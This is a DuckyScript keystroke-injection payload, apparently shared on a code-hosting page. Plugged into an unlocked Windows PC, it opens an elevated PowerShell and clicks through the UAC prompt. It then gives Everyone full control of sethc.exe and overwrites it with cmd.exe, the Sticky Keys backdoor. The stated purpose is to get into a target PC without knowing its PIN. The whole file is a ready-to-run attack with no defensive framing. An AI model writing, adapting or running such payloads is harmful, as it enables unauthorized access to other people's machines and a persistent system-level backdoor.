22 lines
966 B
Plaintext
22 lines
966 B
Plaintext
REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)
|
|
REM Description: Switch cmd.exe with sethc.exe, allowing to get access to target pc without knowing the pin.
|
|
REM Version: 1.0
|
|
REM Category: Execution
|
|
DELAY 750
|
|
WINDOWS d
|
|
DELAY 1500
|
|
WINDOWS r
|
|
DELAY 1500
|
|
STRING powershell Start-Process powershell -Verb runAs
|
|
ENTER
|
|
DELAY 750
|
|
LEFTARROW
|
|
ENTER
|
|
DELAY 1500
|
|
ALT y
|
|
DELAY 1500
|
|
GUI UP
|
|
DELAY 1500
|
|
STRING copy c:\windows\system32\sethc.exe c:\;$acl = Get-Acl c:\windows\system32\sethc.exe;$AccessRule1 = New-Object System.Security.AccessControl.FileSystemAccessRule("Jeder","FullControl","Allow");$AccessRule2 = New-Object System.Security.AccessControl.FileSystemAccessRule("Everyone","FullControl","Allow");$acl.SetAccessRule($AccessRule1);$acl | Set-Acl c:\windows\system32\sethc.exe;$acl.SetAccessRule($AccessRule2);$acl | Set-Acl c:\windows\system32\sethc.exe;Copy-Item -Path c:\windows\system32\cmd.exe -Destination c:\windows\system32\sethc.exe -Recurse -force; exit
|
|
ENTER
|